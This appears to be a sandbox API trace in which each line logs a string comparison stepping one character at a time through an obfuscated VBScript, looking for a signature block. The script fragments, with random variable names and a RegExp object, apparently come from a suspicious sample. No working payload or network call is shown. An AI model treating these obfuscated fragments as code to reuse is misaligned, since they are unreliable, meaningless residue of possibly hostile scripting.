	[0033.913] wcsncmp (_String1="t0t7x2u\"\r\nisaeac = \"\"\r\nujwjiv = -", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 103
	[0033.913] wcsncmp (_String1="0t7x2u\"\r\nisaeac = \"\"\r\nujwjiv = -8", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 35
	[0033.913] wcsncmp (_String1="t7x2u\"\r\nisaeac = \"\"\r\nujwjiv = -80", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 103
	[0033.913] wcsncmp (_String1="7x2u\"\r\nisaeac = \"\"\r\nujwjiv = -800", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 42
	[0033.913] wcsncmp (_String1="x2u\"\r\nisaeac = \"\"\r\nujwjiv = -8005", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 107
	[0033.913] wcsncmp (_String1="2u\"\r\nisaeac = \"\"\r\nujwjiv = -80055", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 37
	[0033.913] wcsncmp (_String1="u\"\r\nisaeac = \"\"\r\nujwjiv = -80055\r", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 104
	[0033.913] wcsncmp (_String1="\"\r\nisaeac = \"\"\r\nujwjiv = -80055\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 21
	[0033.913] wcsncmp (_String1="\r\nisaeac = \"\"\r\nujwjiv = -80055\r\nz", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 66
	[0033.913] wcsncmp (_String1="\nisaeac = \"\"\r\nujwjiv = -80055\r\nzj", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned -3
	[0033.913] wcsncmp (_String1="isaeac = \"\"\r\nujwjiv = -80055\r\nzjh", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 92
	[0033.913] wcsncmp (_String1="saeac = \"\"\r\nujwjiv = -80055\r\nzjhe", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 102
	[0033.913] wcsncmp (_String1="aeac = \"\"\r\nujwjiv = -80055\r\nzjhex", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 84
	[0033.913] wcsncmp (_String1="eac = \"\"\r\nujwjiv = -80055\r\nzjhexc", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 88
	[0033.913] wcsncmp (_String1="ac = \"\"\r\nujwjiv = -80055\r\nzjhexcv", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 84
	[0033.913] wcsncmp (_String1="c = \"\"\r\nujwjiv = -80055\r\nzjhexcv ", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 86
	[0033.913] wcsncmp (_String1=" = \"\"\r\nujwjiv = -80055\r\nzjhexcv =", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 19
	[0033.913] wcsncmp (_String1="= \"\"\r\nujwjiv = -80055\r\nzjhexcv = ", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 48
	[0033.913] wcsncmp (_String1=" \"\"\r\nujwjiv = -80055\r\nzjhexcv = 0", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 19
	[0033.913] wcsncmp (_String1="\"\"\r\nujwjiv = -80055\r\nzjhexcv = 0\r", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 21
	[0033.913] wcsncmp (_String1="\"\r\nujwjiv = -80055\r\nzjhexcv = 0\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 21
	[0033.913] wcsncmp (_String1="\r\nujwjiv = -80055\r\nzjhexcv = 0\r\ne", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 78
	[0033.914] wcsncmp (_String1="\nujwjiv = -80055\r\nzjhexcv = 0\r\nev", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned -3
	[0033.914] wcsncmp (_String1="ujwjiv = -80055\r\nzjhexcv = 0\r\nevt", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 104
	[0033.914] wcsncmp (_String1="jwjiv = -80055\r\nzjhexcv = 0\r\nevtf", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 93
	[0033.914] wcsncmp (_String1="wjiv = -80055\r\nzjhexcv = 0\r\nevtfg", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 106
	[0033.914] wcsncmp (_String1="jiv = -80055\r\nzjhexcv = 0\r\nevtfga", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 93
	[0033.914] wcsncmp (_String1="iv = -80055\r\nzjhexcv = 0\r\nevtfga ", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 92
	[0033.914] wcsncmp (_String1="v = -80055\r\nzjhexcv = 0\r\nevtfga =", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 105
	[0033.914] wcsncmp (_String1=" = -80055\r\nzjhexcv = 0\r\nevtfga = ", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 19
	[0033.914] wcsncmp (_String1="= -80055\r\nzjhexcv = 0\r\nevtfga = 1", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 48
	[0033.914] wcsncmp (_String1=" -80055\r\nzjhexcv = 0\r\nevtfga = 14", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 19
	[0033.914] wcsncmp (_String1="-80055\r\nzjhexcv = 0\r\nevtfga = 141", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 32
	[0033.914] wcsncmp (_String1="80055\r\nzjhexcv = 0\r\nevtfga = 141\r", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 43
	[0033.914] wcsncmp (_String1="0055\r\nzjhexcv = 0\r\nevtfga = 141\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 35
	[0033.914] wcsncmp (_String1="055\r\nzjhexcv = 0\r\nevtfga = 141\r\nz", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 35
	[0033.914] wcsncmp (_String1="55\r\nzjhexcv = 0\r\nevtfga = 141\r\nzd", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 40
	[0033.914] wcsncmp (_String1="5\r\nzjhexcv = 0\r\nevtfga = 141\r\nzdg", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 40
	[0033.914] wcsncmp (_String1="\r\nzjhexcv = 0\r\nevtfga = 141\r\nzdgb", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 83
	[0033.914] wcsncmp (_String1="\nzjhexcv = 0\r\nevtfga = 141\r\nzdgbw", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned -3
	[0033.914] wcsncmp (_String1="zjhexcv = 0\r\nevtfga = 141\r\nzdgbwy", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 109
	[0033.914] wcsncmp (_String1="jhexcv = 0\r\nevtfga = 141\r\nzdgbwyx", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 93
	[0033.914] wcsncmp (_String1="hexcv = 0\r\nevtfga = 141\r\nzdgbwyx ", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 91
	[0033.914] wcsncmp (_String1="excv = 0\r\nevtfga = 141\r\nzdgbwyx =", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 88
	[0033.914] wcsncmp (_String1="xcv = 0\r\nevtfga = 141\r\nzdgbwyx = ", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 107
	[0033.914] wcsncmp (_String1="cv = 0\r\nevtfga = 141\r\nzdgbwyx = \"", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 86
	[0033.914] wcsncmp (_String1="v = 0\r\nevtfga = 141\r\nzdgbwyx = \"e", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 105
	[0033.914] wcsncmp (_String1=" = 0\r\nevtfga = 141\r\nzdgbwyx = \"e ", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 19
	[0033.914] wcsncmp (_String1="= 0\r\nevtfga = 141\r\nzdgbwyx = \"e c", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 48
	[0033.914] wcsncmp (_String1=" 0\r\nevtfga = 141\r\nzdgbwyx = \"e cy", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 19
	[0033.914] wcsncmp (_String1="0\r\nevtfga = 141\r\nzdgbwyx = \"e cy1", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 35
	[0033.914] wcsncmp (_String1="\r\nevtfga = 141\r\nzdgbwyx = \"e cy1y", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 62
	[0033.914] wcsncmp (_String1="\nevtfga = 141\r\nzdgbwyx = \"e cy1y1", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned -3
	[0033.914] wcsncmp (_String1="evtfga = 141\r\nzdgbwyx = \"e cy1y1e", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 88
	[0033.914] wcsncmp (_String1="vtfga = 141\r\nzdgbwyx = \"e cy1y1e3", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 105
	[0033.914] wcsncmp (_String1="tfga = 141\r\nzdgbwyx = \"e cy1y1e3\"", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 103
	[0033.914] wcsncmp (_String1="fga = 141\r\nzdgbwyx = \"e cy1y1e3\"\r", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 89
	[0033.914] wcsncmp (_String1="ga = 141\r\nzdgbwyx = \"e cy1y1e3\"\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 90
	[0033.915] wcsncmp (_String1="a = 141\r\nzdgbwyx = \"e cy1y1e3\"\r\nS", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 84
	[0033.915] wcsncmp (_String1=" = 141\r\nzdgbwyx = \"e cy1y1e3\"\r\nSe", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 19
	[0033.915] wcsncmp (_String1="= 141\r\nzdgbwyx = \"e cy1y1e3\"\r\nSet", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 48
	[0033.915] wcsncmp (_String1=" 141\r\nzdgbwyx = \"e cy1y1e3\"\r\nSet ", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 19
	[0033.915] wcsncmp (_String1="141\r\nzdgbwyx = \"e cy1y1e3\"\r\nSet u", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 36
	[0033.915] wcsncmp (_String1="41\r\nzdgbwyx = \"e cy1y1e3\"\r\nSet uv", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 39
	[0033.915] wcsncmp (_String1="1\r\nzdgbwyx = \"e cy1y1e3\"\r\nSet uvj", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 36
	[0033.915] wcsncmp (_String1="\r\nzdgbwyx = \"e cy1y1e3\"\r\nSet uvji", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 83
	[0033.915] wcsncmp (_String1="\nzdgbwyx = \"e cy1y1e3\"\r\nSet uvjiv", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned -3
	[0033.915] wcsncmp (_String1="zdgbwyx = \"e cy1y1e3\"\r\nSet uvjivf", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 109
	[0033.915] wcsncmp (_String1="dgbwyx = \"e cy1y1e3\"\r\nSet uvjivfe", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 87
	[0033.915] wcsncmp (_String1="gbwyx = \"e cy1y1e3\"\r\nSet uvjivfee", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 90
	[0033.915] wcsncmp (_String1="bwyx = \"e cy1y1e3\"\r\nSet uvjivfee ", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 85
	[0033.915] wcsncmp (_String1="wyx = \"e cy1y1e3\"\r\nSet uvjivfee =", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 106
	[0033.915] wcsncmp (_String1="yx = \"e cy1y1e3\"\r\nSet uvjivfee = ", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 108
	[0033.915] wcsncmp (_String1="x = \"e cy1y1e3\"\r\nSet uvjivfee = N", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 107
	[0033.915] wcsncmp (_String1=" = \"e cy1y1e3\"\r\nSet uvjivfee = NE", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 19
	[0033.915] wcsncmp (_String1="= \"e cy1y1e3\"\r\nSet uvjivfee = NEW", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 48
	[0033.915] wcsncmp (_String1=" \"e cy1y1e3\"\r\nSet uvjivfee = NEW ", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 19
	[0033.915] wcsncmp (_String1="\"e cy1y1e3\"\r\nSet uvjivfee = NEW R", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 21
	[0033.915] wcsncmp (_String1="e cy1y1e3\"\r\nSet uvjivfee = NEW Re", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 88
	[0033.915] wcsncmp (_String1=" cy1y1e3\"\r\nSet uvjivfee = NEW Reg", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 19
	[0033.915] wcsncmp (_String1="cy1y1e3\"\r\nSet uvjivfee = NEW RegE", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 86
	[0033.915] wcsncmp (_String1="y1y1e3\"\r\nSet uvjivfee = NEW RegEx", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 108
	[0033.915] wcsncmp (_String1="1y1e3\"\r\nSet uvjivfee = NEW RegExp", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 36
	[0033.915] wcsncmp (_String1="y1e3\"\r\nSet uvjivfee = NEW RegExp\r", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 108
	[0033.915] wcsncmp (_String1="1e3\"\r\nSet uvjivfee = NEW RegExp\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 36
	[0033.915] wcsncmp (_String1="e3\"\r\nSet uvjivfee = NEW RegExp\r\nb", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 88
	[0033.915] wcsncmp (_String1="3\"\r\nSet uvjivfee = NEW RegExp\r\nbd", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 38
	[0033.915] wcsncmp (_String1="\"\r\nSet uvjivfee = NEW RegExp\r\nbdh", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 21
	[0033.915] wcsncmp (_String1="\r\nSet uvjivfee = NEW RegExp\r\nbdhd", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 44
	[0033.915] wcsncmp (_String1="\nSet uvjivfee = NEW RegExp\r\nbdhdg", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned -3
	[0033.915] wcsncmp (_String1="Set uvjivfee = NEW RegExp\r\nbdhdga", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 70
	[0033.915] wcsncmp (_String1="et uvjivfee = NEW RegExp\r\nbdhdga ", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 88
	[0033.915] wcsncmp (_String1="t uvjivfee = NEW RegExp\r\nbdhdga =", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 103
	[0033.915] wcsncmp (_String1=" uvjivfee = NEW RegExp\r\nbdhdga = ", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 19
	[0033.915] wcsncmp (_String1="uvjivfee = NEW RegExp\r\nbdhdga = \"", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 104
	[0033.915] wcsncmp (_String1="vjivfee = NEW RegExp\r\nbdhdga = \"a", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 105
	[0033.915] wcsncmp (_String1="jivfee = NEW RegExp\r\nbdhdga = \"aj", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 93
	[0033.916] wcsncmp (_String1="ivfee = NEW RegExp\r\nbdhdga = \"ajs", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 92
	[0033.916] wcsncmp (_String1="vfee = NEW RegExp\r\nbdhdga = \"ajsc", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 105
	[0033.916] wcsncmp (_String1="fee = NEW RegExp\r\nbdhdga = \"ajscw", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 89
	[0033.916] wcsncmp (_String1="ee = NEW RegExp\r\nbdhdga = \"ajscw ", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 88
	[0033.916] wcsncmp (_String1="e = NEW RegExp\r\nbdhdga = \"ajscw h", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 88
	[0033.916] wcsncmp (_String1=" = NEW RegExp\r\nbdhdga = \"ajscw hi", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 19
	[0033.916] wcsncmp (_String1="= NEW RegExp\r\nbdhdga = \"ajscw hi\"", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 48
	[0033.916] wcsncmp (_String1=" NEW RegExp\r\nbdhdga = \"ajscw hi\"\r", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 19
	[0033.916] wcsncmp (_String1="NEW RegExp\r\nbdhdga = \"ajscw hi\"\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 65
	[0033.916] wcsncmp (_String1="EW RegExp\r\nbdhdga = \"ajscw hi\"\r\nb", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 56
	[0033.916] wcsncmp (_String1="W RegExp\r\nbdhdga = \"ajscw hi\"\r\nbe", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 74
	[0033.916] wcsncmp (_String1=" RegExp\r\nbdhdga = \"ajscw hi\"\r\nbej", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 19
	[0033.916] wcsncmp (_String1="RegExp\r\nbdhdga = \"ajscw hi\"\r\nbeju", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 69
	[0033.916] wcsncmp (_String1="egExp\r\nbdhdga = \"ajscw hi\"\r\nbejug", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 88
	[0033.916] wcsncmp (_String1="gExp\r\nbdhdga = \"ajscw hi\"\r\nbejugg", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 90
	[0033.916] wcsncmp (_String1="Exp\r\nbdhdga = \"ajscw hi\"\r\nbejugg ", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 56
	[0033.916] wcsncmp (_String1="xp\r\nbdhdga = \"ajscw hi\"\r\nbejugg =", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 107
	[0033.916] wcsncmp (_String1="p\r\nbdhdga = \"ajscw hi\"\r\nbejugg = ", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 99
	[0033.916] wcsncmp (_String1="\r\nbdhdga = \"ajscw hi\"\r\nbejugg = t", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 59
	[0033.916] wcsncmp (_String1="\nbdhdga = \"ajscw hi\"\r\nbejugg = tr", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned -3
	[0033.916] wcsncmp (_String1="bdhdga = \"ajscw hi\"\r\nbejugg = tru", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 85
	[0033.916] wcsncmp (_String1="dhdga = \"ajscw hi\"\r\nbejugg = true", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 87
	[0033.916] wcsncmp (_String1="hdga = \"ajscw hi\"\r\nbejugg = true\r", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 91
	[0033.916] wcsncmp (_String1="dga = \"ajscw hi\"\r\nbejugg = true\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 87
	[0033.916] wcsncmp (_String1="ga = \"ajscw hi\"\r\nbejugg = true\r\nv", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 90
	[0033.916] wcsncmp (_String1="a = \"ajscw hi\"\r\nbejugg = true\r\nvs", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 84
	[0033.916] wcsncmp (_String1=" = \"ajscw hi\"\r\nbejugg = true\r\nvsw", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 19
	[0033.916] wcsncmp (_String1="= \"ajscw hi\"\r\nbejugg = true\r\nvswd", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 48
	[0033.916] wcsncmp (_String1=" \"ajscw hi\"\r\nbejugg = true\r\nvswdj", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 19
	[0033.916] wcsncmp (_String1="\"ajscw hi\"\r\nbejugg = true\r\nvswdje", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 21
	[0033.916] wcsncmp (_String1="ajscw hi\"\r\nbejugg = true\r\nvswdjeg", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 84
	[0033.916] wcsncmp (_String1="jscw hi\"\r\nbejugg = true\r\nvswdjegx", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 93
	[0033.916] wcsncmp (_String1="scw hi\"\r\nbejugg = true\r\nvswdjegxt", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 102
	[0033.916] wcsncmp (_String1="cw hi\"\r\nbejugg = true\r\nvswdjegxt ", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 86
	[0033.916] wcsncmp (_String1="w hi\"\r\nbejugg = true\r\nvswdjegxt =", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 106
	[0033.916] wcsncmp (_String1=" hi\"\r\nbejugg = true\r\nvswdjegxt = ", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 19
	[0033.916] wcsncmp (_String1="hi\"\r\nbejugg = true\r\nvswdjegxt = \"", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 91
	[0033.916] wcsncmp (_String1="i\"\r\nbejugg = true\r\nvswdjegxt = \"6", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 92
	[0033.916] wcsncmp (_String1="\"\r\nbejugg = true\r\nvswdjegxt = \"6u", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 21
	[0033.917] wcsncmp (_String1="\r\nbejugg = true\r\nvswdjegxt = \"6ua", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 59
	[0033.917] wcsncmp (_String1="\nbejugg = true\r\nvswdjegxt = \"6uag", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned -3
	[0033.917] wcsncmp (_String1="bejugg = true\r\nvswdjegxt = \"6uag0", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 85
	[0033.917] wcsncmp (_String1="ejugg = true\r\nvswdjegxt = \"6uag0 ", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 88
	[0033.917] wcsncmp (_String1="jugg = true\r\nvswdjegxt = \"6uag0 a", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 93
	[0033.917] wcsncmp (_String1="ugg = true\r\nvswdjegxt = \"6uag0 ax", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 104
	[0033.917] wcsncmp (_String1="gg = true\r\nvswdjegxt = \"6uag0 ax\"", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 90
	[0033.917] wcsncmp (_String1="g = true\r\nvswdjegxt = \"6uag0 ax\"\r", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 90
	[0033.917] wcsncmp (_String1=" = true\r\nvswdjegxt = \"6uag0 ax\"\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 19
	[0033.917] wcsncmp (_String1="= true\r\nvswdjegxt = \"6uag0 ax\"\r\ng", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 48
	[0033.917] wcsncmp (_String1=" true\r\nvswdjegxt = \"6uag0 ax\"\r\ngv", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 19
	[0033.917] wcsncmp (_String1="true\r\nvswdjegxt = \"6uag0 ax\"\r\ngvw", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 103
	[0033.917] wcsncmp (_String1="rue\r\nvswdjegxt = \"6uag0 ax\"\r\ngvwu", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 101
	[0033.917] wcsncmp (_String1="ue\r\nvswdjegxt = \"6uag0 ax\"\r\ngvwuz", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 104
	[0033.917] wcsncmp (_String1="e\r\nvswdjegxt = \"6uag0 ax\"\r\ngvwuzb", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 88
	[0033.917] wcsncmp (_String1="\r\nvswdjegxt = \"6uag0 ax\"\r\ngvwuzbz", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 79
	[0033.917] wcsncmp (_String1="\nvswdjegxt = \"6uag0 ax\"\r\ngvwuzbz ", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned -3
	[0033.917] wcsncmp (_String1="vswdjegxt = \"6uag0 ax\"\r\ngvwuzbz =", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 105
	[0033.917] wcsncmp (_String1="swdjegxt = \"6uag0 ax\"\r\ngvwuzbz = ", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 102
	[0033.917] wcsncmp (_String1="wdjegxt = \"6uag0 ax\"\r\ngvwuzbz = -", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 106
	[0033.917] wcsncmp (_String1="djegxt = \"6uag0 ax\"\r\ngvwuzbz = -5", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 87
	[0033.917] wcsncmp (_String1="jegxt = \"6uag0 ax\"\r\ngvwuzbz = -56", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 93
	[0033.917] wcsncmp (_String1="egxt = \"6uag0 ax\"\r\ngvwuzbz = -560", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 88
	[0033.917] wcsncmp (_String1="gxt = \"6uag0 ax\"\r\ngvwuzbz = -5605", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 90
	[0033.917] wcsncmp (_String1="xt = \"6uag0 ax\"\r\ngvwuzbz = -56051", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 107
	[0033.917] wcsncmp (_String1="t = \"6uag0 ax\"\r\ngvwuzbz = -56051\r", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 103
	[0033.917] wcsncmp (_String1=" = \"6uag0 ax\"\r\ngvwuzbz = -56051\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 19
	[0033.917] wcsncmp (_String1="= \"6uag0 ax\"\r\ngvwuzbz = -56051\r\nu", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 48
	[0033.917] wcsncmp (_String1=" \"6uag0 ax\"\r\ngvwuzbz = -56051\r\nuv", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 19
	[0033.917] wcsncmp (_String1="\"6uag0 ax\"\r\ngvwuzbz = -56051\r\nuvj", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 21
	[0033.917] wcsncmp (_String1="6uag0 ax\"\r\ngvwuzbz = -56051\r\nuvji", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 41
	[0033.917] wcsncmp (_String1="uag0 ax\"\r\ngvwuzbz = -56051\r\nuvjiv", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 104
	[0033.917] wcsncmp (_String1="ag0 ax\"\r\ngvwuzbz = -56051\r\nuvjivf", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 84
	[0033.917] wcsncmp (_String1="g0 ax\"\r\ngvwuzbz = -56051\r\nuvjivfe", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 90
	[0033.917] wcsncmp (_String1="0 ax\"\r\ngvwuzbz = -56051\r\nuvjivfee", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 35
	[0033.917] wcsncmp (_String1=" ax\"\r\ngvwuzbz = -56051\r\nuvjivfee.", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 19
	[0033.917] wcsncmp (_String1="ax\"\r\ngvwuzbz = -56051\r\nuvjivfee.P", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 84
